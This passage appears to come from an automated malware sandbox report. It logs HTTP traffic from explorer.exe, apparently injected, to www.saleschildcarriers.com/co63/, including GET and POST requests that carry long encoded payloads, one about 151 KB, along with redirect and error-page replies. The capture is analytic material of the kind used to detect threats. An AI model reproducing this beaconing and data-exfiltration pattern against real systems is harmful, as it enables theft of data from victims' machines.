                                                      Data Ascii: Uit4poL7CYvo8O9HGzQhN357Wxw~tR0pjv21YMVr9LiCH0EKd4v(uKRBHnNII4uIY~OlHJqgPSlpWGRAbRwad1LzVDQ~wwt24~Zz1sRmwKIdRS6nJGbidUHkDa3qXjPD0vzzx2E~I1s4px-(fTLrIqA0UpcPNz_E7J8s_rkWDTbAtRW7d08xghfXVUkOrtOUYR7Q93Vc92msBbq4gV4uVyUgiL906mNfLAJ3TO4i8kucuybvfXk
                                                      Jul 20, 2023 11:46:59.614639997 CEST1129OUTData Raw: 36 35 71 54 37 30 37 44 34 66 6b 70 5a 61 6a 68 77 53 62 76 44 54 37 36 34 31 6c 6d 65 44 62 71 66 48 46 4b 53 37 74 43 6e 50 56 55 61 79 57 6b 59 36 41 6e 46 76 66 50 34 58 7a 38 75 44 32 5a 69 35 36 62 36 72 4d 6a 76 75 76 6c 73 59 55 59 6e 58
                                                      Data Ascii: 65qT707D4fkpZajhwSbvDT7641lmeDbqfHFKS7tCnPVUayWkY6AnFvfP4Xz8uD2Zi56b6rMjvuvlsYUYnXTcwtnhFY8P4C2n_3wx7w-KPNDZW58Yh1Wc-6_7Ka8gIvxe0HudGYOmldvV3fdKmhYjmEXSSf6uIAu2meK6KALjmnQurai4Yn_HalRKwdZuiXQDuAPicggpCJIPIpFwwxuNoJ6N4w_hMJDezWpCO9seKxhM1fCMkXS
                                                      Jul 20, 2023 11:47:00.118531942 CEST1192INHTTP/1.1 402 Payment Required
                                                      Date: Thu, 20 Jul 2023 09:47:00 GMT
                                                      Content-Type: text/html; charset=utf-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      X-Sorting-Hat-PodId: 275
                                                      X-Sorting-Hat-ShopId: 78317551892
                                                      X-Frame-Options: DENY
                                                      X-ShopId: 78317551892
                                                      X-ShardId: 275
                                                      Vary: Accept
                                                      Server-Timing: processing;dur=26
                                                      X-Shopify-Stage: production
                                                      Content-Security-Policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=b5755be8-b3ad-4420-ba97-0fa1ee78048b
                                                      X-Content-Type-Options: nosniff
                                                      X-Download-Options: noopen
                                                      X-Permitted-Cross-Domain-Policies: none
                                                      X-XSS-Protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=b5755be8-b3ad-4420-ba97-0fa1ee78048b
                                                      X-Dc: gcp-europe-west3,gcp-us-east1,gcp-us-east1
                                                      X-Request-ID: b5755be8-b3ad-4420-ba97-0fa1ee78048b
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LoEz99bmhVljZVFAucYeje2iBGamZ0dFb12M5QZ1VfK%2BiYpQZKT%2Bz3u61ASTEJ5SK12mV%2BCcYUZPjV%2B84NX0G0IFuTgwRqjylzZgpinsz5IGwfsiun
                                                      Data Raw:
                                                      Data Ascii:
                                                      Jul 20, 2023 11:47:00.118568897 CEST1193INData Raw: 78 41 4c 70 31 42 68 4b 79 59 46 50 33 67 62 64 6c 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a
                                                      Data Ascii: xALp1BhKyYFP3gbdl"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=536.000013Server: cloudflareCF-RAY: 7e9a47ba4af22bf1-FRAalt-svc: h3=":443
                                                      Jul 20, 2023 11:47:00.118597031 CEST1194INData Raw: 31 62 39 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 53 6f
                                                      Data Ascii: 1b9e<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <title>Something went wrong.</title> <meta name="referrer" content="never" /> <style type="text/css"> * { border:0; margin:0; padding:0; -moz-box-sizing:border-b
                                                      Jul 20, 2023 11:47:00.118621111 CEST1195INData Raw: 78 3b 20 6d 61 78 2d 77 69 64 74 68 3a 36 35 30 70 78 3b 20 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 3b 20 70 61 64 64 69 6e 67 3a 32 30 70 78 3b 20 7d 0a 0a 20 20 20 20 2e 68 65 72 6f 20 7b 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 33 30 70 78
                                                      Data Ascii: x; max-width:650px; margin:0 auto; padding:20px; } .hero { margin-bottom:30px; } .content--block { position:relative; margin-bottom:50px; } .content--desc { margin-bottom:32px; position:relative; } .content--desc-large { font
                                                      Jul 20, 2023 11:47:00.118647099 CEST1197INData Raw: 20 73 6b 65 74 63 68 3a 74 79 70 65 3d 22 4d 53 41 72 74 62 6f 61 72 64 47 72 6f 75 70 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 39 37 2e 30 30 30 30 30 30 2c 20 2d 38 32 2e 30 30 30 30 30 30 29 22 3e 0a 20 20 20
                                                      Data Ascii: sketch:type="MSArtboardGroup" transform="translate(-297.000000, -82.000000)"> <g id="well-be-back" sketch:type="MSLayerGroup" transform="translate(299.000000, 84.000000)"> <path d="M209.391799,46.714415
                                                      Jul 20, 2023 11:47:00.118670940 CEST1198INData Raw: 31 36 30 31 32 34 2c 34 32 2e 38 36 38 35 32 38 33 20 4c 31 33 35 2e 37 34 34 30 36 35 2c 33 37 2e 32 36 38 38 33 30 32 22 20 69 64 3d 22 53 74 72 6f 6b 65 2d 37 22 20 73 74 72 6f 6b 65 3d 22 23 42 34 42 35 42 34 22 20 73 74 72 6f 6b 65 2d 77 69
                                                      Data Ascii: 160124,42.8685283 L135.744065,37.2688302" id="Stroke-7" stroke="#B4B5B4" stroke-width="2" stroke-linecap="round" sketch:type="MSShapeGroup"></path> <path d="M0.458340557,61.6156981 L-0.149164087,54.5929811 C-0.410879257,5
                                                      Jul 20, 2023 11:47:00.118699074 CEST1199INData Raw: 68 61 70 65 47 72 6f 75 70 22 3e 3c 2f 70 61 74 68 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 32 30 35 2e 30 34 34 33 34 34 2c 34 33 2e 38 33 39 38 34 39 31 20 4c 34 2e 33 39 38 39 38 34
                                                      Data Ascii: hapeGroup"></path> <path d="M205.044344,43.8398491 L4.39898452,61.2733585" id="Fill-9" fill="#FFFFFF" sketch:type="MSShapeGroup"></path> <path d="M205.044344,43.8398491 L4.39898452,61.2733585" id="St
                                                      Jul 20, 2023 11:47:00.118721008 CEST1200INData Raw: 38 39 2c 31 30 36 2e 30 33 39 30 31 39 20 37 32 2e 30 33 36 30 38 33 36 2c 31 30 37 2e 36 34 32 30 33 38 20 37 31 2e 36 31 35 30 33 34 31 2c 31 30 37 2e 39 35 31 30 39 34 20 43 36 39 2e 36 32 35 30 34 39 35 2c 31 31 32 2e 37 32 32 37 39 32 20 36
                                                      Data Ascii: 89,106.039019 72.0360836,107.642038 71.6150341,107.951094 C69.6250495,112.722792 67.8811858,114.945962 66.1312198,114.945962 C64.4626161,114.945962 63.2652353,112.974113 62.1071796,111.066792 C61.8827554,110.697283 61.6617214,110.333208 61.442


                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      3192.168.2.549714172.67.215.25480C:\Windows\explorer.exe
                                                      TimestampkBytes transferredDirectionData
                                                      Jul 20, 2023 11:44:50.607834101 CEST163OUTGET /co63/?aJElwV=gtjAeIS6VJWpMIOvAorICaUf7+ed7+VEBFwjlL0fBy8QswGl2t9TVUNzPjmUB+tmUyAO&lz=9rXXjDMXIb6HXH- HTTP/1.1
                                                      Host: www.saleschildcarriers.com
                                                      Connection: close
                                                      Data Raw: 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      Jul 20, 2023 11:44:50.752696991 CEST164INHTTP/1.1 301 Moved Permanently
                                                      Date: Thu, 20 Jul 2023 09:44:50 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Location: https://www.saleschildcarriers.com/co63/?aJElwV=gtjAeIS6VJWpMIOvAorICaUf7+ed7+VEBFwjlL0fBy8QswGl2t9TVUNzPjmUB+tmUyAO&lz=9rXXjDMXIb6HXH-
                                                      Strict-Transport-Security: max-age=31536000
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2LKVhN5b3wO%2BSzD%2F%2Fzgq9Bg5mgHW9xOBXsfhwGNRM0GBx2s6wrL%2BebnWtYOi%2BLTEVvvZpjh7%2BFAZ6eGVuaKjD8apijc34gMrzRu5KzefAzavr5v8ErbegST1hnIXrRWDy9WCkf7EaREkdp7Chw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 7e9a44944f4a9158-FRA
                                                      alt-svc: h3=":443"; ma=86400
                                                      Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                      Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
                                                      Jul 20, 2023 11:44:50.752728939 CEST164INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      4192.168.2.549715172.67.215.25480C:\Windows\explorer.exe
                                                      TimestampkBytes transferredDirectionData
                                                      Jul 20, 2023 11:44:52.809835911 CEST166OUTPOST /co63/ HTTP/1.1
                                                      Host: www.saleschildcarriers.com
                                                      Connection: close
                                                      Content-Length: 1484
                                                      Cache-Control: no-cache
                                                      Origin: http://www.saleschildcarriers.com
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Accept: */*
                                                      Referer: http://www.saleschildcarriers.com/co63/
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate
                                                      Data Raw: 61 4a 45 6c 77 56 3d 6f 50 76 36 41 73 65 6a 5a 70 4b 5f 58 6f 36 6a 61 38 71 44 57 74 34 70 39 39 36 68 34 71 52 39 61 7a 31 42 28 59 67 65 48 6a 67 46 6b 78 44 5f 7e 34 68 43 46 51 45 4f 4d 52 69 46 46 4f 6c 56 46 6d 49 47 30 51 43 67 30 74 44 69 37 6f 68 63 46 4f 4a 6c 58 35 71 4b 6b 75 30 6e 6b 62 6b 72 53 67 28 57 6d 6b 4a 76 6d 56 4e 52 72 53 69 37 71 74 63 32 4a 4c 78 4b 71 74 70 43 6b 56 64 50 53 63 36 55 31 65 36 71 4a 69 44 34 4e 38 4c 61 39 38 4e 4a 67 55 4e 78 41 33 72 63 64 52 58 48 7a 4c 4b 65 72 68 4f 70 73 5f 54 77 61 6d 61 4e 66 6a 6c 75 72 61 31 65 50 50 6d 77 58 44 7e 49 39 4d 51 42 66 6a 4f 51 52 74 61 7a 4c 30 30 69 7e 2d 66 77 6a 32 68 69 50 31 61 55 30 6f 6e 64 35 55 48 67 57 75 6c 64 7a 59 32 58 56 79 52 4a 6a 33 58 52 74 44 47 6b 28 56 32 36 55 59 50 70 59 34 39 64 59 4c 6b 6c 4b 49 78 37 70 68 69 4a 75 36 51 6f 70 56 74 53 73 52 57 46 62 47 4c 4b 4d 4a 4d 62 6f 51 61 4c 59 62 45 44 35 4a 31 68 31 66 44 38 76 67 52 70 67 4d 36 58 45 59 58 42 76 2d 36 44 38 6c 75 52 4a 6c 32 71 7a 32 74 4e 72 53 69 55 38 76 6d 5f 6f 6a 67 39 37 78 73 7a 79 54 33 72 36 5a 78 76 55 56 42 35 53 63 58 42 59 36 36 46 42 53 6a 65 74 58 6e 59 6c 57 4b 51 65 72 4f 79 73 53 33 64 4e 68 68 31 6b 4f 4f 61 75 54 73 63 4b 68 48 49 39 6f 6b 4a 6a 4b 71 61 38 30 5a 71 77 5f 77 57 4a 58 4e 58 41 41 65 34 77 61 59 33 6f 55 41 58 61 6b 30 53 36 30 68 35 64 33 70 59 56 2d 41 7a 4a 65 76 37 34 6b 55 67 77 32 45 52 41 6f 71 4a 4d 73 4a 38 67 46 6e 56 48 66 30 43 6d 36 4d 65 49 38 41 4b 4a 64 35 57 53 73 38 55 63 35 61 50 34 69 48 54 39 4b 30 54 64 7a 59 76 6a 67 34 6c 6c 74 28 30 6e 31 51 7a 51 53 41 50 4f 33 36 5f 39 64 30 4f 52 46 62 47 30 76 34 39 31 42 76 6a 50 78 6b 4e 50 5f 5a 34 37 44 4d 75 50 76 30 6d 6f 4f 6e 45 6a 71 5a 6d 6c 67 35 78 77 68 59 43 32 30 6e 68 6d 5f 7a 5f 4b 61 6e 50 5a 37 39 70 58 2d 47 4b 52 34 32 35 75 61 66 54 68 54 4c 73 42 50 6b 4e 76 45 39 67 76 5f 73 5a 28 33 44 34 73 7a 28 70 72 72 45 42 53 70 45 54 6b 6d 37 54 71 5a 52 52 66 62 5a 6c 7a 32 6e 73 39 52 52 50 45 39 48 55 49 61 50 49 53 62 52 61 36 61 48 48 37 4b 59 78 78 4e 56 71 6f 4a 72 54 75 2d 50 43 56 76 78 53 7a 69 62 61 6d 71 6d 54 32 36 57 67 61 50 6c 67 76 35 48 71 38 69 71 39 31 63 31 71 38 39 68 44 66 67 47 33 78 47 41 74 47 4e 72 44 42 59 5a 42 42 67 6b 57 58 4b 31 4e 4c 56 42 57 64 59 56 74 46 50 34 37 31 42 35 47 48 74 79 64 49 65 44 48 49 66 6b 69 72 76 71 6b 50 68 45 55 73 6b 52 6b 34 45 5a 75 63 46 46 75 4b 75 30 55 45 32 52 6d 6e 46 41 70 67 6d 63 33 28 51 79 43 62 75 32 45 6f 38 6c 5f 31 76 63 78 6c 33 5a 36 64 4f 4c 72 48 6b 47 2d 5a 41 52 47 69 77 6a 4a 78 57 53 77 36 73 54 49 64 76 43 4d 78 41 52 4b 57 38 41 34 6c 49 71 42 51 7a 67 76 75 38 54 58 69 68 50 48 45 30 7a 73 51 68 6d 46 4a 6f 39 4a 4f 39 54 62 4e 78 38 65 4a 38 52 6c 62 30 41 43 6a 45 69 56 74 59 55 47 6d 48 71 6c 72 6d 35 32 72 50 30 47 7e 31 71 62 4a 48 68 6d 66 69 63 36 68 52 34 5f 50 35 44 43 70 48 44 44 49 36 41 74 36 5a 58 44 70 6f 31 76 70 74 73 76 66 49 72 65 47 37 4f 53 77 4d 51 6c 61 37 54 46 73 76 57 65 78 6d 6b 70 30 76 50 51 63 76 7a 72 6d 59 79 78 7a 56 30 57 41 6e 43 33 64 72 48 49 28 49 69 63 5a 68 61 68 6e 75 56 57 6d 37 6e 7a 47 6f 55 79 35 76 67 64 37 65 74 55 30 53 45 6b 63 42 70 6e 77 78 46 74 69 6f 66 4b 4e 74 70 41 39 52 46 6f 53 31 69 45 76 63 67 43 6f 69 43 70 33 7a 31 76 70 72 6d 4d 64 57 42 30 64 43 6f 65 36 49 64 42 48 30 41 45 4f 78 52 2d 4a 47 6b 6d 30 32 49 54 47 4d 58 38 4d 36 41 42 51 4c 4d 41 66 52 50 57 4a 53 28 65 38 4b 61 44 66 4f 53 6d 36 32 63 50 4a 48 72 4a 79 34 59 46 4f 58 34 38 4d 5a 43 6a 47 52 4d 78 50 4b 44 6e 76 79 75 65 59 64 49 67 72 56 36 74 51 71 6c 4e 4c 46 38 43 6e 46 72 4f 66 53 68 59 32 6f 31 51 70 54 69 6a 4f 79 62 76 31 5f 30 48 6d 68 73 79 50 6e 49 63 6c 42 38 77 76 33 65 38 73 48 6b 66 62 48 35 39 44 6d 37 65 4f 58 7e 6a 32 67 53 6f 54 64 28 42 37 38 4e 52 77 37 59 72 32 5a 34 44 76 6a 35 33 64 37 4a 70 46 76 65 4b 75 6c 59 30 41 5f 38 4d 59 39 49 33 6c 70 71 44 4d 56 75 65 28 41 6d 42 53 53 47 73 43 44 65 56 7e 68 50 6c 64 37 73 45 72 78 4f 65 7e 71 63 52 71 45 38 4e 50 65 41 30 54 55 4c 48 61 64 76 69
                                                      Data Ascii: aJElwV=oPv6AsejZpK_Xo6ja8qDWt4p996h4qR9az1B(YgeHjgFkxD_~4hCFQEOMRiFFOlVFmIG0QCg0tDi7ohcFOJlX5qKku0nkbkrSg(WmkJvmVNRrSi7qtc2JLxKqtpCkVdPSc6U1e6qJiD4N8La98NJgUNxA3rcdRXHzLKerhOps_TwamaNfjlura1ePPmwXD~I9MQBfjOQRtazL00i~-fwj2hiP1aU0ond5UHgWuldzY2XVyRJj3XRtDGk(V26UYPpY49dYLklKIx7phiJu6QopVtSsRWFbGLKMJMboQaLYbED5J1h1fD8vgRpgM6XEYXBv-6D8luRJl2qz2tNrSiU8vm_ojg97xszyT3r6ZxvUVB5ScXBY66FBSjetXnYlWKQerOysS3dNhh1kOOauTscKhHI9okJjKqa80Zqw_wWJXNXAAe4waY3oUAXak0S60h5d3pYV-AzJev74kUgw2ERAoqJMsJ8gFnVHf0Cm6MeI8AKJd5WSs8Uc5aP4iHT9K0TdzYvjg4llt(0n1QzQSAPO36_9d0ORFbG0v491BvjPxkNP_Z47DMuPv0moOnEjqZmlg5xwhYC20nhm_z_KanPZ79pX-GKR425uafThTLsBPkNvE9gv_sZ(3D4sz(prrEBSpETkm7TqZRRfbZlz2ns9RRPE9HUIaPISbRa6aHH7KYxxNVqoJrTu-PCVvxSzibamqmT26WgaPlgv5Hq8iq91c1q89hDfgG3xGAtGNrDBYZBBgkWXK1NLVBWdYVtFP471B5GHtydIeDHIfkirvqkPhEUskRk4EZucFFuKu0UE2RmnFApgmc3(QyCbu2Eo8l_1vcxl3Z6dOLrHkG-ZARGiwjJxWSw6sTIdvCMxARKW8A4lIqBQzgvu8TXihPHE0zsQhmFJo9JO9TbNx8eJ8Rlb0ACjEiVtYUGmHqlrm52rP0G~1qbJHhmfic6hR4_P5DCpHDDI6At6ZXDpo1vptsvfIreG7OSwMQla7TFsvWexmkp0vPQcvzrmYyxzV0WAnC3drHI(IicZhahnuVWm7nzGoUy5vgd7etU0SEkcBpnwxFtiofKNtpA9RFoS1iEvcgCoiCp3z1vprmMdWB0dCoe6IdBH0AEOxR-JGkm02ITGMX8M6ABQLMAfRPWJS(e8KaDfOSm62cPJHrJy4YFOX48MZCjGRMxPKDnvyueYdIgrV6tQqlNLF8CnFrOfShY2o1QpTijOybv1_0HmhsyPnIclB8wv3e8sHkfbH59Dm7eOX~j2gSoTd(B78NRw7Yr2Z4Dvj53d7JpFveKulY0A_8MY9I3lpqDMVue(AmBSSGsCDeV~hPld7sErxOe~qcRqE8NPeA0TULHadviMIhCYHlY1_0JTXbUOo9FCqrzx_68y_NlVKHuDONToD9eghXognpk6U(npnIjkH~mhuriyrd7AeDTKRJ0Wswj4qvu2emBu6yr~btUohwRLlYrZjYDHMXpzg).
                                                      Jul 20, 2023 11:44:52.927716017 CEST319INHTTP/1.1 301 Moved Permanently
                                                      Date: Thu, 20 Jul 2023 09:44:52 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Location: https://www.saleschildcarriers.com/co63/
                                                      Strict-Transport-Security: max-age=31536000
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RZ%2FP2fm9hVmIWbQeWZAhldnh4jXPMp1lrzWOmpv19fPCvYi1S9TXH6ik1HcxJsQ0mVcvariRhQWE8uiw81CkLphlDcaY%2FnTIYdkTBRaEAcqoRSejcUb%2BjEwL%2FYk1V5HqLuZmJc%2FlYZOyUgNCBQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 7e9a44a20aff18df-FRA
                                                      alt-svc: h3=":443"; ma=86400
                                                      Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                      Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
                                                      Jul 20, 2023 11:44:52.927746058 CEST319INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      5192.168.2.549716172.67.215.25480C:\Windows\explorer.exe
                                                      TimestampkBytes transferredDirectionData
                                                      Jul 20, 2023 11:44:52.832479000 CEST179OUTPOST /co63/ HTTP/1.1
                                                      Host: www.saleschildcarriers.com
                                                      Connection: close
                                                      Content-Length: 151296
                                                      Cache-Control: no-cache
                                                      Origin: http://www.saleschildcarriers.com
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Accept: */*
                                                      Referer: http://www.saleschildcarriers.com/co63/
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate
                                                      Data Raw: 61 4a 45 6c 77 56 3d 6f 50 76 36 41 74 6d 4e 66 5a 7e 4d 64 36 75 67 5a 50 53 78 53 4e 49 42 79 66 7e 34 36 39 63 61 58 46 34 71 28 5a 51 43 50 42 55 62 70 79 4c 5f 34 2d 30 45 66 67 45 4e 62 42 69 47 54 5f 5a 74 4d 56 34 65 30 55 61 65 30 74 4c 6c 6a 35 78 56 4e 4d 68 2d 5a 4a 6e 75 37 2d 77 45 67 5a 63 71 53 43 44 61 33 51 56 76 72 45 35 54 32 30 57 67 6f 5a 45 36 41 4b 64 49 68 49 31 62 78 57 55 70 44 4a 43 51 79 66 61 47 59 54 36 30 44 2d 6a 2d 7e 65 74 46 28 56 39 32 4b 56 57 56 61 7a 7a 39 28 70 79 47 6e 42 33 74 6b 65 58 75 50 6c 69 46 66 68 4a 39 73 62 46 33 46 73 48 4f 49 67 58 71 35 4c 6f 42 64 57 50 56 5a 4b 75 39 48 57 73 41 7a 4e 47 54 33 57 52 48 66 42 65 54 78 35 4c 51 34 57 76 4f 53 4c 63 68 67 70 4f 68 66 41 35 62 67 58 54 59 7a 6a 62 30 36 55 75 7a 56 4a 6a 30 62 36 4a 76 56 4b 6c 4e 49 5f 68 33 69 56 36 78 74 64 49 65 70 47 31 34 38 43 6d 47 52 31 54 4e 4e 4c 6b 4c 69 51 57 61 56 37 63 66 33 71 74 56 31 66 48 6b 75 44 4d 51 6c 4d 36 52 41 62 6a 51 76 2d 79 44 38 6c 7e 42 4a 58 4f 71 68 6c 31 61 38 67 4b 4c 6c 66 6d 61 72 7a 51 55 78 69 35 5f 79 54 6e 5f 72 36 52 76 54 58 56 35 58 38 6e 4f 61 36 36 46 50 79 6a 63 74 58 6e 51 6c 57 4c 30 65 70 75 2d 76 53 28 64 46 41 64 33 6b 39 57 51 6f 41 77 38 46 68 48 4d 38 71 4e 55 6e 4c 47 79 38 33 34 35 7a 66 55 57 64 47 35 55 4c 42 4f 38 67 6f 67 30 6a 30 30 48 54 45 4d 34 36 30 74 43 63 32 35 36 66 2d 39 72 49 65 76 6b 33 31 34 4a 6d 48 45 64 62 74 58 56 54 62 74 50 68 31 6a 37 48 5f 67 48 6f 36 31 52 4a 2d 30 65 53 74 74 73 5a 34 59 49 51 72 43 34 38 68 43 57 7a 65 6b 67 50 6e 78 58 72 68 6b 30 6e 72 7a 79 6e 45 68 53 64 54 30 62 45 58 76 46 76 36 39 62 55 46 4c 35 7e 2d 77 63 33 51 4b 30 61 43 63 5a 46 5f 45 67 74 42 6f 79 4b 4b 55 33 79 4c 33 47 6d 4c 4a 37 69 54 5a 32 28 31 51 74 33 30 71 5f 77 4c 44 51 4b 71 7a 31 50 35 6c 4e 44 75 61 44 58 36 32 62 67 61 76 6a 6c 77 75 53 4e 38 77 67 6c 47 64 43 74 76 77 36 30 68 28 64 6c 78 4c 51 79 65 6b 68 61 72 63 37 38 6c 48 65 75 4c 52 43 51 4a 5a 48 70 57 53 49 28 57 38 7a 53 38 76 50 46 36 6e 39 50 4c 35 70 28 38 76 79 38 6f 6b 4d 39 35 6c 45 68 62 28 7a 76 64 48 30 58 39 35 5f 73 6d 4c 56 71 70 4b 6f 7e 5f 61 68 66 75 78 76 75 4a 7a 61 33 31 69 57 7a 76 49 4b 28 73 52 62 65 58 71 61 78 47 59 78 47 2d 54 54 4f 2d 42 42 4b 48 77 52 58 70 74 4a 4b 46 42 57 49 49 55 2d 49 76 30 65 31 45 78 47 47 74 6d 64 4f 6f 37 46 49 66 6b 34 6f 72 69 63 4f 52 46 57 74 6d 31 52 34 45 34 62 63 41 30 70 4a 74 68 70 41 33 5a 6c 74 31 41 74 69 55 30 73 28 51 66 30 62 75 36 58 68 63 31 51 67 50 6c 63 76 6e 5a 36 62 4d 6d 32 51 47 7e 6e 49 33 5a 43 76 78 44 33 33 32 4f 63 6e 4e 66 62 54 4c 4f 4b 31 33 70 4b 44 4e 45 30 37 34 65 37 56 44 34 65 75 65 37 47 74 41 58 51 4b 47 66 39 53 51 43 46 43 59 59 54 57 72 58 4d 59 52 38 73 4c 74 5a 55 64 31 4d 5f 72 6b 43 51 73 4c 67 4a 78 48 72 6f 71 47 4d 68 77 35 39 44 30 47 76 43 4a 31 5a 45 65 47 51 35 68 41 51 4f 57 73 7a 67 7e 42 4c 51 64 75 4e 6d 6c 70 43 62 7a 6f 5a 36 34 6f 73 47 53 4a 54 31 45 62 61 37 28 6f 63 66 4a 6f 7e 69 75 5a 47 5f 7a 45 68 4c 33 75 33 43 54 36 37 51 28 36 7a 62 32 33 59 48 42 47 48 5f 49 4b 72 30 69 61 53 5f 66 30 66 44 6b 5f 64 45 35 4d 65 75 5a 2d 59 53 28 2d 56 68 34 66 70 73 36 43 73 50 62 32 55 50 79 43 4a 63 79 70 61 54 54 4e 56 72 36 53 31 63 59 48 75 31 30 64 6f 44 6c 46 36 61 37 68 4a 2d 72 4b 4f 35 66 6b 4e 45 49 77 30 39 74 50 52 79 42 68 63 4d 4b 79 31 4b 4a 48 38 79 33 57 51 54 42 39 6e 38 65 4a 59 42 62 62 59 44 57 41 48 72 63 46 61 6d 6d 72 57 6d 50 63 6d 69 67 6e 52 76 49 6b 57 55 7a 62 74 4c 51 31 34 74 63 2d 28 69 46 69 30 77 59 72 58 77 31 46 4b 50 51 74 45 55 70 43 54 43 64 6f 56 6f 51 7a 67 62 33 30 50 6a 57 78 56 6d 70 49 78 6c 75 67 66 2d 4d 43 6d 54 72 75 59 69 73 58 6b 66 4e 6d 4e 6a 71 6a 45 45 76 67 79 52 6b 42 68 58 4e 58 35 74 4f 78 76 5a 4a 57 57 55 79 53 43 65 57 74 6e 48 6d 5f 6c 6b 79 6f 77 6f 32 5a 67 36 78 44 68 74 43 6f 35 67 4b 4b 7a 68 39 45 35 50 51 76 45 34 55 50 68 6d 6d 4b 71 37 62 43 47 4a 77 7a 32 55 54 7a 69 36 4b 69 32 5f 6c 42 33 34 47 73 67 5f 6e 33 7e 35 79 75 51 50 72 42 4e 4a 4a 76 59 68 63 32 33 54 4f 5f 62 71
